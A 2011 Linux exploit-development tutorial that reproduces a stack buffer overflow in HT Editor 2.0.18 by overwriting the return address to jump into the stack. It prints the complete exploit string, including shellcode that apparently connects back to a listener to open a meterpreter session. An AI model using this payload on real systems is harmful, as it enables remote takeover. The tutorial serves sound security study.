Linux exploit development part 2 (rev 2) - Real app demo (part 2)

This will be a short tutorial demonstrating a "buffer overflow" exploit on a real application which
is freely available using the techniques covered in part 2 of my tutorial series, if you have not
read it you can check it our here:

Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg

NOTE:
* This paper will not go in depth with explanations (as this has already been covered in
the tutorial mentioned above).
* This paper will not teach you about "buffer overflows" (as mentioned this is just a
demonstration).
* I am not responsible for anything you do with this knowledge.

Requirements:
* The required knowledge for this can be found in the previous mentioned paper.
* You will need a Debian Squeeze (latest).
* Backtrack 4 R2 (Or any other distribution with Metasploit on it).
* Some GDB knowledge.
* checksec.sh (a very useful script).
* The vulnerable application (HT Editor <= 2.0.18)

If you do not posses the required knowledge I can not guarantee that this paper will be
beneficial for you.

Let us begin!

Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
Compiling and checking our vulnerable application.

As you have probably expected the vulnerable application will be taken from exploit-db, the
application is called “HT Editor”. (I did not discover this vulnerability I am just reproducing it).

You can download the application from: exploit-db.com or sourceforge.net (The version has to
be <= 2.0.18).

Now that we have the application let’s go ahead and compile it by typing:

##############################
./configure
##############################

This is how the configure output should look like (make sure you try and make it look the same).

Figure 1.

Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
After obtaining the same output we still need to make some changes in the Makefile to turn off
NX, we just need to add the “-z execstack” flag in some lines.

Figure 2.

##############################
make
make install
##############################

We have your application up and running now let’s see what protections is has using
checksec.sh (again, make sure the results match if not the exploit might now work).

Figure 3.

As we see there are no protections, let us move on.

Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
Open application in debugger and trigger the exception.

Now we open our application in GDB and send it some junk to see it’s behaviour. After a few
tries we see that the offset needed for an exception to occur is “4108”.

Figure 4.

Once you send the junk the image might look something like this (could happen only here).

Figure 5.

If this happens just type in gdb “shell clear” and press ENTER.

Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
Ok so far so good! Now let’s check the registers and see what we have.

Figure 6.

We have overwritten EBX, ESI, EDI and EIP. If we take a look into ESP we see that the ESP
points to our buffer which actually goes a little higher.

Figure 7.

Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
A few tries as we see that the offset needed before EIP overwrite is 4073. We send the
application more junk and check ESP again.

Figure 8.

Figure 9.

So ESP actually points right after the EIP overwrite occurs, now we can make our exploit
skeleton which should look like this:

##############################
JUNK + 4073 + EIP (Overwrite with a JMP/CALL %esp instruction) + NOP Sled + SC
##############################

Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
Finding the right instruction.

First thing is first let’s find our JMP/CALL %esp instruction.

Figure 10.

There are a lot of valid JMP/CALL %esp instructions we are just going to choose “0x0818f8ff”,
now for our shellcode. This time we will use a meterpreter (as it is more fun).

Figure 11.

Now let us see how the exploit should look like:

##############################
"\x41" * 4073 (JUNK) + "\xff\xf8\x18\x08" (JMP %esp) + "\x90" * 30 (NOP Sled)
+ "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x01\x42\x66\x68\
x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\
x80\xff\xe1" (Shell Code)
##############################
Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
Setting up a listener and testing the exploit.

First let’s set up a listener in Metasploit.

Figure 12.

And when we run the exploit inside GDB.

Figure 13.

Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
Now reboot the system and let’s try again.

Figure 14.

Figure 15.

Figure 16.
BOOM a meterpreter session!
Watch quick video demo: Linux exploit development part 2 (rev 2) - Demo
Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
Thanks go to:
1. Contributors: Alexandre Maloteaux (troulouliou) and jduck for their grate help!
2. Reviewers: g0tmi1k for taking the time to review my paper!

Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011